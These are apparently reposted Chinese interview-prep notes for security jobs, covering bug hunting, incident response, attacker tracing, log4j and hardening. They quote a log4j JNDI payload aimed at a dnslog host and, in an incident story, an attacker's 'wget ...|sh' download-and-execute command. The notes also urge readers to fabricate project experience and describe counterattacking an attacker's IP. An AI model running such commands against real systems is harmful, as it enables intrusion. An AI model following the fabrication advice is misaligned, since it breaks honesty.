- 项目经历 因为大家写的都是渗透相关,所以编故事也要编的圆润些,题材可以去freebuf看 https://search.freebuf.com/search/?search=%E6%8C%96%E6%B4%9E#article 这里主要记录如何挖洞的,实际项目也可以百度一下 看看别人故事咋编的 2、技术能力 大家底子应该都各不相同,在面试中可能会问到你们不懂的知识点,不要慌 可以迂回战术 ,大部分问题应该会围绕 应急 溯源 渗透(近一年比较火的漏洞)来问,也可能会问网络基础的一些东西 应急 溯源 就看下面试宝典中的 案例 或者百度一下 看看别人的思路 渗透的话 能捋清楚思路,结合上面的项目经历讲明白即可 也有可能会问些比较奇怪的问题,这个时候大方点承认 这块儿不太熟就行
- 你平时是怎么挖漏洞的? - 白盒测试: - 就去找一些敏感文件和可能存在漏洞的关键函数什么的,有一个专门的代码审计手册,按照上面操作就行。- 比如说:很多人不注意的那个install文件,安装完成后不删除,会进行二次安装,还有一些sql注入的关键词:select、$_GET、$_POST、gbk啥的- 文件上传的关键词,$_FILES,csrf:token、reffer头、命令执行:shell_exec、system 文件包含:include、文件下载:file_get_contents、fopen、xss:echo、var_dump- 使用工具+人工方式进行挖掘- 黑盒的话: - 以我的经验来看,只要是有输入的地方,就有可能存在漏洞,尤其是登录注册那块,是否存在暴力破解、sql注入、xss、不安全的验证码啥的- 第一步肯定是要进行信息收集,收集尽可能多的信息,方便挖掘漏洞,你可以使用谷歌、百度等搜索引擎,搜集敏感信息,尤其是robots.txt文件- 也可以借助工具去搜集信息,指纹识别工具,目录扫描工具去扫描,如果扫描出它是拿开源软件写的话,就可以去搜索对应的漏洞- 也可以用工具去扫描他开放了哪些端口、尤其是那些危险端口- 还有就是看它的文件上传的地方,是否存在文件上传漏洞,文件下载的地方,是否存在敏感信息泄露,个人中心是否存在逻辑漏洞,还有那些交易的页面,购物车页面测试是否存在逻辑漏洞- 一般来说的话,我会采用工具+人工的方式进行漏洞挖掘,漏洞最多的话还是弱口令、sql注入、反序列化、任意读取等
- 应急这块了解吗: - linux中毒嘛,按照他们的说法是第一步先来个断网,主要还是看用户啊,密码文件是否有多余账户,用whoami看当前的用户权限,top查看负载啊、资源占比情况,awk等命令过滤,用ps看下有哪些危险的进程,用chkconfig --list看下有没有可疑的服务,还有用crontab查看它有没有可疑的定时任务等,用history查看操作工哪些命令,netstat -antlp查看危险端口,runlevel 查看允许级别,cat /var/log/sevure 查看安全日志,有web站点的话,就用D盾、河马查杀等工具或者手工对关键函数、脚本木马关键词进行查杀- windows的话也是一样的,查看有没有可疑的账号,服务器是否存在弱口令,用命令打开操作系统日志,查看管理员登录时间、用户名是否异常等等,再一个就是检查端口和进程,也是使用命令netstat -ano 查看端口连接状态,根据那个PID定位到进程,进行查杀,同样有web站点的话,我们可以使用D盾、火绒剑等工具进行查杀,主要是看那些危险进程,有没有签名、可疑的描述信息啥的,再一个就是检查它的服务、启动项、计划任务等,看它的安全日志里是不是有可疑操作,还有就是看他的操作系统是不是打了补丁,工具的话,可以使用360、卡巴斯基查杀病毒木马- 正规流程: - 断网:防止进一步操作- 取证:分析登录日志、服务日志看有哪些操作- 备份:备份服务器文件,主要看它的修改时间和创建时间,对比文件前后的变化- 查漏:寻找业务薄弱点,修补漏洞- 杀毒:清除后门、webshell、管理账号等- 溯源:摸清黑客IP地址,入侵手段等- 记录:归档、预防
- 溯源怎么做? - 其实就是渗透的反向过程- 攻击ip的定位,高精度ip定位网站去查,ID追踪手段,社工库匹配,威胁情报库匹配,看他留下的痕迹,有手机号,邮箱的话,就去查它相关的注册信息- 查看有没有恶意程序:比如说pdf、doc、exe等,使用恶意程序分析网站,比如微步在线等去查- 业务功能的有没有留下痕迹,定位到ip,看它近期的操作等
- Apache log4j2漏洞了解吗? - 就是存在JNDI注入漏洞嘛,当程序将用户输入的日志被记录时,即可触发此漏洞,${jndi:ladp://z2xcu7.dnslog.cn/exp},成功利用此漏洞可以在目标服务器上执行任意远程代码。- 可以利用DNSlog生成临时域名查看测试是否有效。
- 反序列化了解吗? - 就是字符串转化为对象的过程。对与php来说,就是那两个函数的,serialize、unserralize,处理对象、魔术函数的时候导致,当他的参数可控时,用户精心构造的payload就会触发里边的魔术方法,造成危害。- java的话就找ObjectInputStrem.readObject()这个方法,检测readObject()方法调用时判断其对象是否为java.io.ObjectOutputStream。如果此时ObjectInputStream对象的初始化参数来自外部请求输入参数则基本可以确定存在反序列化漏洞了。黑盒测试的话就调用ysoserial并依次生成各个第三方库利用payload,该payload构造为访问特定url链接,根据http访问请求记录判断反序列化是否成功利用。
- 安全加固: - 禁用不必要的网络服务- 更换设备- 禁用该服务- 利用深层防御机制补救- 修改不安全的配置- 安全设备出厂时,默认会有一个管理员账户,配置一些口令,需要修改- 利用最小权限(Least-Privilege)原则严格对设备的访问控制- 需要访问设备的人才能被允许进行设备访问,安全设备做得更好- 及时对系统进行软件升级- 主动寻找这方面的知识和软件更新,获取像原设备厂商、CCERT、FIRST这类机构的帮助,及时对存在已知安全问题的系统进行升级。- 提供符合IPP要求的物理保护环境- 理论上讲,只要从物理上能接近设备,设备的安全性就无从谈起,因为此时我们常提到的安全服务,如访问控制、鉴别服务等就不能起到保护作用。- 物理的改变设备上的一些硬件开关就可以重置管理员口令字或恢复出厂设置.
- 云安全: - 由云计算衍生而来,主要保障云自身及云上各种应用的安全,包括云计算平台系统安全,用户数据安全存储和隔离、用户接入认证、信息传输安全、网络攻击防护、合规审计等。企业将计算资源、应用放到云上,自然涉及到对云的安全需求,云计算共享架构下,应用和数据安全保障技术,典型的就是抗ddos,完整的云计算安全体系,涵盖物理安全、主机安全、数据安全、网络安全、应用安全,利用云计算、大数据或者人工智能技术,能够对收集海量的样本进行分析,从而对攻击进行更精准的预测和打击。业务放到云上,坏处是数据/应用与攻击的接触面增大,包括基础设施资源共享、网络传输,好处是云端技术先进、完善,有专业的团队随时进行维护升级。- 主要目的就是一个实时识别、分析、预警安全威胁的统一安全管理系统,通过防勒索、防病毒、防篡改、镜像安全扫描、合规检查等安全能力,实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上资产和本地服务器并满足监管合规要求。- 云安全的基线检查:包括弱口令、高危风险利用、最佳安全实践、容器安全、等保合规、自定义基线。
- 谈谈你做的项目: - 结合客户目前网络安全防护的现状,从技术、管理、人员三大维度对客户 的信息安全防护能力进行全面提升,将信息安全工作进行常态化的巡视,提升全体员 工的信息安全防护意识,加大对突发信息安全事件的应急响应能力,确保网络与信息 系统的安全运行,降低业务系统信息安全风险,保障业务系统的持续、稳定运行,提 升整体信息安全防护水平。 具体工作:负责参与安全服务项目方案设计;根据项目约定为客户提供各种安全服务, 如安全巡检、漏洞扫描、渗透测试、应急响应等;负责项目开展实施过程中协调和管 控,确保项目按进度完成;负责项目交付材料汇总和验证;
- 基线检查: - 就是系统最低安全要求的配置,针对操作系统和服务(数据库、服务器软件、中间件等)的弱口令、账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置,并提供检测结果,针对存在的风险配置给出加固建议,常见的标准有ISO270001、等级保护2.0等,主机安全检查包括WINDOWS、LINUX、AIX、HP-UNIX、SOLARIS,数据库安全检查包括MSSQL、ORACLE、SYBASE等,中间件安全检查包括IIS、APACHE、WEBLOGIC、JBOSS等,网络/安全设备检查包括防火墙、路由器、交换机等,检查的内容有安全漏洞:漏洞通常是由于软件或协议等系统自身存在缺陷引起的安全风险,如系统登录漏洞、拒绝服务漏洞、缓冲区溢出、信息泄漏、蠕虫后门、恶意代码执行等,反映了系统自身的安全脆弱性;安全配置:通常都是由于人为的疏忽造成,主要包括了账号、口令、授权、日志、IP协议等方面的配置要求,配置不当导致系统存在安全风险;系统状态:包含系统端口状态、进程、账号、服务以及重要文件变化的监控。
- 有意思的溯源事件: - 有一天我们公司或客户反应公司门户网站打开之后会弹赌博和色情网页,接到用户反 应之后,我通过自己的电脑打开公司门户网站并没有发现弹赌博和色情网页,后来通过手 机访问发现果然一打开就会弹赌博和色情网页,后面我通过以下方法进行一步一步排查: 1、 打开 burp 设置手机代理抓包发现网站首页返回包里面有一串代码,访问 xx.js 文件里面还包含了一串 xx.js 文件,打开包含的 js 文件发现里面有弹出来的色情赌博网站。 2、 我立马登录服务器通过 netstat –anplt、ps aux、chkconfig –list 查看当前服务器连 接、进程、服务等并没有发现异常; 3、 访问开机启动配置文件/etc/rc.local、/etc/rc.d/rc[0~6].d 也没发现异常;查看 crontab 定时任务也正常; 4、 查看/etc/passwd、/etc/shadow 也正常; 5、 使用 vi 对/etc/profile 配置文件进行加入显示 ip、日期时间、详细命令代码,再使 用 histroy 查看历史命令,发现攻击者使用了 wget –o –q http://www.xxx.com/xx/logo.jpg|sh 下载脚本后门,我立马通过 find / -name logo.jpg 找出攻击者下载到服务器的 logo.jpg 文件,打开 logo.jpg 发现里面存在一段通过 if 判断 user-agent 头判断用户是通过手机还是 pc 机访问的代码,同时我也通过 xsearch 工具查找网站源代码里面是否存在调用 logo.jpg 文件的代码,果然发现网 站源代码里面存在 include 涵数调用 logo.jpg 文件后门代码,删除网站源代码里面 的 include 涵数调用代码和服务器里面里面的 logo.jpg,接着用手机访问网站首页, 发现还是存在弹赌博和色情网页,排查了很久,结果发现 ngix.conf 配置文件里面 有一行 proxy_pass http://www.xxxx.com/xxx/xx.js 代码,直接删掉再次访问,果然 恢复正常; 6、 接着开始攻击溯源,到网站目录按时间进行排序查看修改过的脚本文件,发现了 新上传的 Webshell,以 webshell 文件名和前面的 logo.jpg 作为关键字到 nginx 日志 文件/var/log/access.log 里面查找攻击痕迹,结果发现了一段 stur2 攻击代码: www.oldboyedu.com 直接使用安恒内部 stur2 内部验证工具对日志里面存在的攻击地址一验证,发现果 然是从 stur2-057 漏洞进来的,立马升级 stur2 框架修复漏洞。 7、 通过日志里面的攻击 ip 到 https://www.opengps.cn/Data/IP/LocHighAcc.aspx 进行定 位,发现是国外菲律宾攻击者,通过漏洞扫描器、手工对攻击 ip 开始尝试反攻, 故事后面你自己再慢慢编编下来,哈哈………
本文转载自: https://blog.csdn.net/qq_41755666/article/details/123834539
版权归原作者 赤赤三 所有, 如有侵权,请联系我们删除。
版权归原作者 赤赤三 所有, 如有侵权,请联系我们删除。